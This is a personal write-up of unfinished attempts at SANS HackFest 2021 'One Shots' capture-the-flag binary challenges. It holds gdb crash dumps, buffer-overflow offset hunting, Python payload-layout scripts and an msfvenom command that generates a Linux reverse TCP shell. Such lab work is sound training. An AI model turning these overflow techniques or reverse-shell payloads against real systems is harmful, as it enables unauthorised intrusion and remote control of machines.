One Shots





nc 5555

Get a shell and read flag in /home/warmup.

author: @landhb

Interested in more challenges like this? Dive deep into the offensive skills to solve them in the following course(s):

SEC660: Advanced Penetration Testing, Exploit Writing, and Ethical Hacking

Challenge Files

warmup Download


I ran the binary and saw that I can seg fault it. one-1

Opened the bin in gdb-peda. Had to install gdb with apt, git clone peda to /opt/peda, and echo "source /opt/peda/" >> ~/.gdbinit.

gdb warmup

Pasted image 20220908202543

First create 100 char pattern:

gdb-peda$ pattern_create 100

Then I run with r, then I paste in my string at the prompt:

gdb-peda$ r
Starting program: /root/Projects/ctf/sans/hackfest_2021/one_shots/0x01/warmup 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
Warmup remote shell.
system @ 0xf7dfd120

Program received signal SIGSEGV, Segmentation fault.
EBX: 0x41414541 ('AEAA')
ECX: 0xffffd076 --> 0x9700000a
EDX: 0xfbad208b
ESI: 0xf7fa2000 --> 0x1e9d6c
EDI: 0xf7fa2000 --> 0x1e9d6c
EBP: 0x30414161 ('aAA0')
EIP: 0x41464141 ('AAFA')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
Invalid $PC address: 0x41464141
0012| 0xffffd04c ("A2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'\n")
0016| 0xffffd050 ("HAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'\n")
0020| 0xffffd054 ("AA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'\n")
0024| 0xffffd058 ("AIAAeAA4AAJAAfAA5AAKAAgAA6AAL'\n")
0028| 0xffffd05c ("eAA4AAJAAfAA5AAKAAgAA6AAL'\n")
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41464141 in ?? ()

I got a seg fault at address 0x41464141. Where is that?

gdb-peda$ pattern_offset 0x41464141
1095123265 found at offset: 43

It's at offset 43. To make sure I have the right EIP location, I'll send 43 A's, 4 B's, and 4 C's. All four B's should land in the EIP. (I had to send 44 A's for some reason, to get 0x42424242).

gdb-peda$ r
Starting program: /root/Projects/ctf/sans/hackfest_2021/one_shots/0x01/warmup
Warmup remote shell.
system @ 0xf7dfd120

Program received signal SIGSEGV, Segmentation fault.
EAX: 0xffffd070 ('A' <repeats 44 times>, "BBBBCCCC\n")
EBX: 0x41414141 ('AAAA')
ECX: 0xffffd0a4 --> 0xa ('\n')
EDX: 0xfbad208b
ESI: 0xf7fa2000 --> 0x1e9d6c
EDI: 0xf7fa2000 --> 0x1e9d6c
EBP: 0x41414141 ('AAAA')
ESP: 0xffffd0a0 ("CCCC\n")
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
Invalid $PC address: 0x42424242
0000| 0xffffd0a0 ("CCCC\n")
0004| 0xffffd0a4 --> 0xa ('\n')
0008| 0xffffd0a8 --> 0x0
0012| 0xffffd0ac --> 0xf7dd6fd6 (<__libc_start_main+262>:       add    esp,0x10)
0016| 0xffffd0b0 --> 0xf7fa2000 --> 0x1e9d6c
0020| 0xffffd0b4 --> 0xf7fa2000 --> 0x1e9d6c
0024| 0xffffd0b8 --> 0x0
0028| 0xffffd0bc --> 0xf7dd6fd6 (<__libc_start_main+262>:       add    esp,0x10)
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x42424242 in ?? ()

I can see that my C's landed in the ESP register. This would be perfect for my shellcode.

Checking out the above output, I can see that the C's landed at 0xffffd0a0, immediately after. Let's see if a 1500 byte payload works. I made a python script to print this out for me.

#!/usr/bin/env python3

# Size to trigger exploit is 44 bytes. EIP immediately after.
filler = 'A' * 44
eip = 'B' * 4
shellcode = 'D' * (1500 - len(filler) - len(eip))

inputBuffer = filler + eip + shellcode


No, that overflowed the command. I'll try with a total size of 550.

#!/usr/bin/env python3

# Size to trigger exploit is 44 bytes. EIP immediately after.
filler = 'A' * 44
eip = 'B' * 4
shellcode = 'D' * (550 - len(filler) - len(eip))

inputBuffer = filler + eip + shellcode


I kept doing this until I got a sig fault that didn't overflow any portion of the D's into the next command within GDB itself. This was at 255 - 44 -4.

#!/usr/bin/env python3

# Size to trigger exploit is 44 bytes. EIP immediately after.
filler = 'A' * 44
eip = 'B' * 4
shellcode = 'D' * (255 - len(filler) - len(eip))
#shellcode = 'D' * 4

inputBuffer = filler + eip + shellcode


That means that I have a 207 byte payload window.

Ok, I can generate a 74 byte rev shell it looks like.

 msfvenom -p linux/x64/shell_reverse_tcp lhost= lport=5555 -f c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of c file: 335 bytes
unsigned char buf[] =

None of that is working. WAIT! Can I just type the command in straight up? That looks like it might have worked. Pasted image 20220908203051

That definitely worked on my local box. one-2

I need to use a bind shell though. Once the CTF opens tomorrow I should be able to just run the shellcode python file, connect to the service, and execute.


This did not end up working when the CTF opened back up. I ran out of time to continue working on this objective.



nc 9999

Get a shell and cat the flag in the /home/babyrop directory.

author: @landhb

Interested in more challenges like this? Dive deep into the offensive skills to solve them in the following course(s):

SEC660: Advanced Penetration Testing, Exploit Writing, and Ethical Hacking

Challenge Files

babyrop Download


First let's see what's going on here, yeah, same terminal prompt.

Simple ROP.

Open in gdb. Pattern create 100.

gdb-peda$ pattern_create 100

Now does it break? Yes.

gdb-peda$ r
Starting program: /root/Projects/ctf/sans/hackfest_2021/one_shots/0x02/babyrop
Simple ROP.

Program received signal SIGSEGV, Segmentation fault.
RBX: 0x0
RCX: 0x7ffff7ed68be (<__GI___libc_read+14>:     cmp    rax,0xfffffffffffff000)
RDX: 0x0
RSI: 0x7ffff7fa6a23 --> 0xfa96a0000000000a
RDI: 0x7ffff7fa96a0 --> 0x0
RBP: 0x6141414541412941 ('A)AAEAAa')
RIP: 0x401164 (<vuln+34>:       ret)
R9 : 0x0
R10: 0x400408 --> 0x7473007374656766 ('fgets')
R11: 0x246
R12: 0x401060 (<_start>:        xor    ebp,ebp)
R13: 0x0
R14: 0x0
R15: 0x0
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
   0x40115d <vuln+27>:  call   0x401040 <fgets@plt>
   0x401162 <vuln+32>:  nop
   0x401163 <vuln+33>:  leave
=> 0x401164 <vuln+34>:  ret
   0x401165 <main>:     push   rbp
   0x401166 <main+1>:   mov    rbp,rsp
   0x401169 <main+4>:   mov    rax,QWORD PTR [rip+0x2ee0]        # 0x404050 <stdin@@GLIBC_2.2.5>
   0x401170 <main+11>:  mov    ecx,0x0
0016| 0x7fffffffdf08 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\n")
0024| 0x7fffffffdf10 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL\n")
0032| 0x7fffffffdf18 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL\n")
0040| 0x7fffffffdf20 ("AJAAfAA5AAKAAgAA6AAL\n")
0048| 0x7fffffffdf28 ("AAKAAgAA6AAL\n")
0056| 0x7fffffffdf30 --> 0xa4c414136 ('6AAL\n')
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000401164 in vuln ()

Can this really be the same answer again?

It wasn't. I ran out of time and did not perform any further work on this objective.



Access the site at and find the flag.

author: @landhb

Interested in more challenges like this? Dive deep into the offensive skills to solve them in the following course(s):

Challenge Files

fileserver Download


Oh ok, I can list dir contents and stuff.

gdb-peda$ r
Starting program: /root/Projects/ctf/sans/hackfest_2021/one_shots/0x03/fileserver
GET /test.txt
HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: no-cache
Content-length: 5
Content-type: text/plain

[Inferior 1 (process 8337) exited normally]

I can list my cwd contents:

gdb-peda$ r
Starting program: /root/Projects/ctf/sans/hackfest_2021/one_shots/0x03/fileserver
HTTP/1.1 200 OK
Content-Type: text/html

<html><head><style>body{font-family: monospace; font-size: 13px;}td {padding: 1.5px 6px;}</style><h1>Initech Developer Tool Server</h1><meta name="viewport" content="width=device-width, initial-scale=1.0"></head><body><table>
<tr><td><a href=".gdb_history">.gdb_history</a></td><td>2021-11-15 21:44</td><td>7</td></tr>
<tr><td><a href="peda-session-fileserver.txt">peda-session-fileserver.txt</a></td><td>2021-11-15 21:58</td><td>8</td></tr>
<tr><td><a href="fileserver">fileserver</a></td><td>2021-11-15 14:06</td><td>21.1K</td></tr>
<tr><td><a href="test.txt">test.txt</a></td><td>2021-11-15 21:45</td><td>5</td></tr>
<tr><td><a href="testdir/">testdir/</a></td><td>2021-11-15 21:47</td><td>[DIR]</td></tr>
</table><br>logged in as: <b>Guest</b></body></html>[Inferior 1 (process 8338) exited normally]

I ran out of time and did not perform any more work on this objective.



nc 6800

Obtain a shell and then run cat /home/vbox/vbox.flag

author: @landhb

Interested in more challenges like this? Dive deep into the offensive skills to solve them in the following course(s):

SEC760: Advanced Exploit Development for Penetration Testers

Challenge Files

vbox Download


I ran out of time and did not perform and work on this objective.